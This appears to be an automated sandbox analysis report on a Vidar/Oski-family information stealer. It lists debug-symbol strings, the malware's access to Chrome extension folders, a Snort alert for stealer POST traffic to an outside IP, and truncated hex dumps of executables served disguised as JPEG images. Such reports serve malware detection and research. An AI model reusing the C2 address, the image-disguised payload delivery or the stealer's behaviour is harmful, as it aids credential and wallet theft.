Source:	Binary string: System.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386864637.0000026D7084C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386970351.0000026D7084D000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: UxTheme.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: win32u.pdbf source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: rsaenh.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: CLBCatQ.pdb* source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: System.Drawing.pdb"" source: WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp
Source:	Binary string: wbemcomn.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: mskeyprotect.pdb source: WerFault.exe, 0000001D.00000003.387264777.0000026D70821000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: WinTypes.pdb` source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: clr.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp, WerFault.exe, 0000001D.00000003.377203232.0000026D6FE56000.00000004.00000001.sdmp
Source:	Binary string: orms.ni.pdb source: WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp
Source:	Binary string: gdi32.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdbS source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: vcruntime140.i386.pdbGCTL source: svchoste.exe, 00000004.00000003.312315900.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.312994791.0000000003827000.00000004.00000001.sdmp, vcruntime140.dll.4.dr
Source:	Binary string: CLBCatQ.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: ntmarta.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: kernel32.pdb source: WerFault.exe, 0000001D.00000003.377294930.0000026D6FDD6000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.378691254.0000026D6FDD6000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp
Source:	Binary string: msvcp140.i386.pdb source: svchoste.exe, 00000004.00000003.306645593.000000000389F000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.307329985.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.306386681.0000000003821000.00000004.00000001.sdmp, msvcp140.dll.4.dr
Source:	Binary string: win32u.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: vaultcli.pdb] source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdb0 source: WerFault.exe, 0000001D.00000003.379211829.0000026D6E058000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.376916862.0000026D6E058000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.377268412.0000026D6E058000.00000004.00000001.sdmp
Source:	Binary string: mscoree.pdb source: WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp
Source:	Binary string: imm32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: rsaenh.pdb= source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: iphlpapi.pdb\| source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: mswsock.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbl source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdbj source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: tion.ni.pdb source: WerFault.exe, 0000001D.00000003.387077452.0000026D7084E000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387228013.0000026D70850000.00000004.00000001.sdmp
Source:	Binary string: UxTheme.pdbH source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: ncrypt.pdbv source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: mswsock.pdb& source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: imm32.pdbB source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: DotNetZip.dll.8.dr
Source:	Binary string: System.Configuration.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: System.Management.pdbDD source: WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp
Source:	Binary string: System.Drawing.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: System.Management.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: nsi.pdbK_ source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp
Source:	Binary string: System.Management.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: ncrypt.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: secur32.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb`g source: chormuim.exe, 00000008.00000002.409878846.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.374653596.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.367278251.000000001D4F8000.00000004.00000010.sdmp
Source:	Binary string: kernel32.pdb0 source: WerFault.exe, 0000001D.00000003.377294930.0000026D6FDD6000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.378691254.0000026D6FDD6000.00000004.00000001.sdmp
Source:	Binary string: WinTypes.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: wbemprox.pdbT source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: rpcrt4.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: pnrpnsp.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: _.pdb source: chormuimii.exe, 00000006.00000002.310578337.00000000036B5000.00000004.00000001.sdmp, chormuimii.exe, 00000006.00000002.311291755.0000000004BA0000.00000004.00020000.sdmp, chormuimii.exe, 00000006.00000002.310112322.0000000002397000.00000004.00000001.sdmp
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr
Source:	Binary string: version.pdbx source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: System.Drawing.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER5768.tmp.dmp.29.dr
Source:	Binary string: ws2_32.pdb! source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, freebl3.dll.4.dr
Source:	Binary string: oleaut32.pdbA source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: chormuim.exe, 00000008.00000003.350741840.000000001B717000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: dnsapi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: dhcpcsvc6.pdb; source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: nlaapi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: lib.pdb.0 source: chormuim.exe, 00000008.00000002.409878846.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.374653596.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.367278251.000000001D4F8000.00000004.00000010.sdmp
Source:	Binary string: winhttp.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: System.Drawing.pdb source: WER5768.tmp.dmp.29.dr
Source:	Binary string: gdi32full.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: gdiplus.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.ni.pdb0 source: WerFault.exe, 0000001D.00000003.376804497.0000026D6FE62000.00000004.00000001.sdmp
Source:	Binary string: ntasn1.pdbn source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: rtutils.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: fwpuclnt.pdb, source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: mscoreei.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: msctf.pdbF source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: msvcr120_clr0400.amd64.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: WLDP.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER5768.tmp.dmp.29.dr
Source:	Binary string: clrjit.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: rasman.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: wbemcomn.pdbi source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: ncryptsslp.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: version.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: wintrust.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386864637.0000026D7084C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386970351.0000026D7084D000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387077452.0000026D7084E000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387228013.0000026D70850000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: psapi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: WMINet_Utils.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbP source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: mscoreei.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: ntdll.pdb source: WerFault.exe, 0000001D.00000003.379211829.0000026D6E058000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.376916862.0000026D6E058000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp, WerFault.exe, 0000001D.00000003.377268412.0000026D6E058000.00000004.00000001.sdmp
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, mozglue.dll.4.dr
Source:	Binary string: System.Core.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: powrprof.pdbY source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: nlaapi.pdbJ source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: wbemprox.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: crypt32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: edputil.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: 4_2_00B743DF FindFirstFileExA,GetLastError,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,_strcpy_s,__invoke_watson,	4_2_00B743DF
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: 4_2_00B90540 wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,	4_2_00B90540
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: 4_2_00B8E640 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	4_2_00B8E640
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: 4_2_00B8D360 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	4_2_00B8D360
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: 4_2_00B8F6B0 FindFirstFileExW,	4_2_00B8F6B0

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe

Code function: 4x nop then add esp, 04h

4_2_00B93050

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2034813 ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern 192.168.2.3:49743 -> 108.167.165.140:80

Downloads files with wrong headers with respect to MIME Content-Type

Show sources

Source: http	Image file has PE prefix: HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:21 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Last-Modified: Thu, 06 Jun 2019 09:01:52 GMT Accept-Ranges: bytes Content-Length: 144848 Keep-Alive: timeout=5, max=75 Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: http	Image file has PE prefix: HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:22 GMT Server: Apache Last-Modified: Mon, 07 Aug 2017 00:52:20 GMT Accept-Ranges: bytes Content-Length: 645592 Keep-Alive: timeout=5, max=74 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 